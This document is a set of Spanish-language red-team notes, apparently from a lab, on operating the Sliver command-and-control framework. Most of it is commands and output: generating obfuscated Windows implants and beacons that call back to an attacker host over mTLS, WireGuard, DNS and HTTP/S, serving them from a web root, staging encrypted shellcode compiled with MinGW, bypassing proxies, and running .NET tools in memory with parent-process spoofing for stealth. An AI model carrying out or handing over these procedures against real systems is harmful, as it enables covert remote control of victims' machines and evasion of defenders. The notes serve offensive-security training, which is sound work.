Vendría a ser el equivalente se tener una shell directa en la máquina víctima, la desventaja es que es muy ruidoso ya que está pendiente al instante de si ejecutamos un comando.
sliver > generate --mtls --arch amd64 --os windows --format exe --save /var/www/html/
[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 1m30s
[*] Implant saved to /var/www/html/TOUGH_JUMBO.exe
# -a, --arch string cpu architecture (default: amd64)
# -f, --format string Specifies the output formats, valid values are: 'exe', 'shared' (for dynamic libraries), 'service' (see `psexec` for more info) and 'shellcode' (windows only) (default: exe)
# -m, --mtls string mtls connection strings
# -o, --os string operating system (default: windows)
# -s, --save string directory/file to the binary to
sliver > mtls
[*] Starting mTLS listener ...
[*] Successfully started job #1
sliver > jobs
ID Name Protocol Port
==== ====== ========== ======
1 mtls tcp 8888
# Acá la víctima ejecutó el exe que creamos arriba
[*] Session 7467d5c1 TOUGH_JUMBO - (DESKTOP-0AHIE2G) - windows/amd64 - Tue, 06 Jun 2023 18:08:48 EDT
sliver > sessions
ID Name Transport Remote Address Hostname Username Operating System Locale Last Message Health
========== ============= =========== =================== ================= ========== ================== ======== ========================================== =========
7467d5c1 TOUGH_JUMBO mtls DESKTOP-0AHIE2G MalTest windows/amd64 en-US Tue Jun 6 18:12:48 EDT 2023 (1m58s ago) [ALIVE]
sliver > use
Un beacon funciona igual solo que lo que querramos ejecutar se lo planifica como una tarea que se va a ejecutar a intervalos de tiempos que definamos, ya que es cada este tiempo que el beacon va a estar checkeando por si se le mandaron nuevas instrucciones.
sliver > generate beacon --mtls --arch amd64 --os windows --format exe --save /var/www/html --seconds 5 --jitter 2
# Flags
# -J, --jitter int beacon interval jitter in seconds (default: 30)
# -S, --seconds int beacon interval seconds (default: 60)
[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 42s
[*] Implant saved to /var/www/html/BEWILDERED_BRONCHITIS.exe
sliver > use beacons
? Select a beacon: [Use arrows to move, type to filter]
> 37a16de8-5756-426d-8814-ba7a14c0ff42 BEWILDERED_BRONCHITIS DESKTOP-0AHIE2G DESKTOP-0AHIE2G\MalTest windows/amd64
68bebc27-19d6-40f5-b9b9-7891726a0ac5 BEWILDERED_BRONCHITIS DESKTOP-0AHIE2G DESKTOP-0AHIE2G\MalTest windows/amd64
sliver > (BEWILDERED_BRONCHITIS) > execute notepad
[*] Tasked beacon BEWILDERED_BRONCHITIS (6d591e51)
sliver > (BEWILDERED_BRONCHITIS) > tasks
ID State Message Type Created Sent Completed
========== ========= ============== =============================== ====== ===========
6d591e51 pending Execute Tue, 06 Jun 2023 23:37:20 EDT
# Por si queremos convertir el beacon a un implant y no esperar a los intervalos:
sliver > interactive
# El beacon se convirtió en una sesión
sliver > sessions
ID Name Transport Remote Address Hostname Username Operating System Locale Last Message Health
========== ======================= =========== =================== ================= ========== ================== ======== ======================================== =========
5c977c73 BEWILDERED_BRONCHITIS mtls DESKTOP-0AHIE2G MalTest windows/amd64 en-US Tue Jun 6 23:38:05 EDT 2023 (30s ago) [ALIVE]
System Info
sliver (goodBoy) > info
Beacon ID: 8d2e1336-18a9-4eaa-af14-c7199015409f
Name: goodBoy
UUID: b58a4d56-453d-1ea9-448c-1fffde95d784
Username: DESKTOP-0AHIE2G\MalTest
UID: S-1-5-21-1050558549-14362656-3383254400-1001
GID: S-1-5-21-1050558549-14362656-3383254400-513
PID: 2472
OS: windows
Version: 10 build 19045 x86_64
Locale: en-US
Arch: amd64
Active C2: https://kali.dnstest.local?driver=wininet
Remote Address:
Proxy URL:
Interval: 5s
Jitter: 0s
First Contact: Sat Jul 1 22:03:57 EDT 2023 (7m45s ago)
Last Checkin: Sat Jul 1 22:11:39 EDT 2023 (3s ago)
Next Checkin: Sat Jul 1 22:11:44 EDT 2023 (in 2s)
whoami: to get the username
getuid: to get the UID
getgid: to get the GID
getpid: to get the PID
sliver (goodBoy) > help reconfig
Reconfigure the active beacon/session
reconfig [flags]
-i, --beacon-interval string beacon callback interval
-j, --beacon-jitter string beacon callback jitter (random up to)
-h, --help display help
-r, --reconnect-interval string reconnect interval for implant
-t, --timeout int command timeout in seconds (default: 60)
execute Creates a new process given an executable and optionally some arguments. Implemented based on Golang’s os/exec package (command handler uses the exec.Command function, if the --token argument is used there is another command handler also using that function).
terminate: kills as process given a PID. Implemented based on Golangs os package (command handler and main implementation which uses os.FindProcess to get a process struct p, then p.Kill to kill it).
kill: kills the current beacon or session. Implemented as a special handler on Windows. For DLL or shellcode implants, it does the following: If the --force flag is set, it calls ExitProcess from kernel32.dll, else it called ExitThread (command handler). For other implants, it just uses Golangs os package to Exit, i.e., kill the current process.
registry list-subkeys: List all subkeys of a given key (command handler).
registry list-values: List all values of a given key (command handler).
DNS address in Beacon
DNS Beacons
sliver > dns -d dnsc2.labnet.local.
[*] Starting DNS listener with parent domain(s) [dnsc2.labnet.local.] ...
[*] Successfully started job #2
sliver > generate beacon --dns dnsc2.labnet.local --seconds 10 --jitter 0 --save /home/kali/Desktop/Sliver/dns-beacon.exe
[*] Generating new windows/amd64 beacon implant binary (10s)
[*] Symbol obfuscation is enabled
[*] Build completed in 2m6s
? Overwrite existing file? Yes
[*] Implant saved to /home/kali/Desktop/Sliver/dns-beacon.exe
[*] Beacon d04b048f WONDERFUL_SUNBONNET - n/a (DESKTOP-0AHIE2G) - windows/amd64 - Sat, 10 Jun 2023 19:07:20 EDT
Se puede pasar también una dirección con nuestro server DNS, y por si llega a fallar la conexión o el servidor dns está caído podemos pasarle la dirección ip aparte.
sliver > mtls
[*] Starting mTLS listener ...
[*] Successfully started job #1
sliver > jobs
ID Name Protocol Port
==== ====== ========== ======
1 mtls tcp 8888
sliver > generate beacon --os windows --arch amd64 --format exe --save /home/kali/Desktop/dns-beacon.exe --seconds 5 --mtls kali.dnstest.local,
[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 25s
? Overwrite existing file? Yes
[*] Implant saved to /home/kali/Desktop/dns-beacon.exe
[*] Beacon f40b0b34 FRIENDLY_CATTLE - (DESKTOP-0AHIE2G) - windows/amd64 - Fri, 09 Jun 2023 22:25:53 EDT
Aparte de mtls podemos usar el protocolo wireguard.
sliver > wg
[*] Starting Wireguard listener ...
[*] Successfully started job #2
sliver > jobs
ID Name Protocol Port
==== ====== ========== ======
1 mtls tcp 8888
2 wg udp 53
sliver > generate beacon --wg kali.dnstest.local --arch amd64 --os windows --format exe --save /home/kali/Desktop/wg-dns-beacon.exe --seconds 5
[*] Generated unique ip for wg peer tun interface:
[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 32s
[*] Implant saved to /home/kali/Desktop/wg-dns-beacon.exe
Bypassing HTTP/S Proxys
Se puede dar el caso de un entorno restrictivo en el que no podamos usar mtls, por lo que podemos setear un listener http y otro https, sobre el que podemos intentar que la víctima se conecte. HTTP es igual de seguro que HTTP/S debido a que el contenido de los implantes ya van cifrados, pero se debe tratar igualmente de usar https en primera instancia. Tambien podemos usar el driver wininet, que si bien es más propenso a ser analizado nos permite más funcionalidades.
sliver > jobs
[*] No active jobs
sliver > http
[*] Starting HTTP :80 listener ...
[*] Successfully started job #3
sliver > https
[*] Starting HTTPS :443 listener ...
[*] Successfully started job #4
sliver > jobs
ID Name Protocol Port
==== ======= ========== ======
3 http tcp 80
4 https tcp 443
sliver > generate beacon --http kali.dnstest.local,kali.dnstest.local?driver=wininet --seconds 5 --jitter 0 --save /tmp/beacon_http.exe
[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 00:00:23
[*] Implant saved to /tmp/beacon_http.exe
Opciones para customizar wininet:
Los perfiles nos permiten el no tener que escribir todas las flags al generar un implante o beacon.
sliver > profiles new --mtls --arch amd64 --os windows --format exe test_profile
[*] Saved new implant profile test_profile
sliver > profiles new beacon --mtls --arch amd64 --os windows --format exe --seconds 5 --jitter 3 test_beacon
[*] Saved new implant profile (beacon) test_beacon
sliver > profiles generate --save /var/www/html test_profile
[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 29s
[*] Implant saved to /var/www/html/IMPORTANT_NAPKIN.exe
sliver > profiles generate --save /var/www/html test_beacon
[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 27s
[*] Implant saved to /var/www/html/SAD_DEPRESSIVE.exe
Como los payloads generados por Sliver pesan mucho (al menos 10mb al estar compilados en GO), podemos generar nuestro propio shellcode en Sliver (a partir de MSFVenom) y creando programa que ejecute esta shellcode.
Basic Stager
Para generar el shellcode es necesario crear un perfil con el cual vamos a generar los listener
sliver > profiles new --mtls kali.dnstest.local --skip-symbols --format shellcode --arch amd64 win64shell
[*] Saved new implant profile win64shell
sliver > mtls
[*] Starting mTLS listener ...
[*] Successfully started job #1
sliver > stage-listener --url tcp://kali.dnstest.local:8443 --profile win64shell
[*] No builds found for profile win64shell, generating a new one
[*] Job 2 (tcp) started
sliver > jobs
ID Name Protocol Port
==== ====== ========== ======
1 mtls tcp 8888
2 TCP tcp 8443
sliver > generate stager --lhost kali.dnstest.local --lport 8443 --arch amd64 --format c --save /tmp
[*] Sliver implant stager saved to: /tmp/WIDE-EYED_PLANET
unsigned char buf[] =
. . .
. . .
Como vamos a usar C para nuestro programa nos debería quedar algo así:
Para posteriormente compilarlo para que funcione en windows con MinGW:
x86_64-w64-mingw32-gcc -o shellexec shellexec.c
Y al ejecutar el programa compilado obtenemos una conexión (no encriptada) con el host víctima:
Encripted Stager
## Generate key and IV ##
head -c 8 /dev/urandom | xxd -p
# Create a profile
profiles new --mtls --format shellcode --skip-symbols --arch amd64 <profile-name>
# Start the listener for the shellcode
stage-listener --url --profile win641 --aes-encrypt-key <aes-key> --aes-encrypt-iv <aes-iv>
# And for the session
sliver > jobs
ID Name Protocol Port
==== ====== ========== ======
3 http tcp 80
4 mtls tcp 8888
Esta función nos permite ejecutar tanto DLL's como ejecutables en memoria, por lo que si queremos utilizar herramientas de terceros que no estén incluidas en Sliver lo podremos hacer a través de esta funcionalidad. Lo primero es tener compilado el ejecutable o la DLL y después especificar si queremos ejecutarlo sobre el proceso en el que tengamos el implante o crear otro proceso para hacerlo más sigiloso. La desventaja es que solo corre únicamente aplicaciones escritas en .NET.
# Mismo proceso
execute-assembly --in-process --loot --name seatbelt /home/kali/Desktop/Sliver/Seatbelt.exe -group=User
# Spoofear otro proceso especificando el process parent id (donde está nuestro implante)
execute-assembly --ppid 5152 --process svchost.exe --loot --name seatbelt /home/kali/Desktop/Sliver/Seatbelt.exe -group=User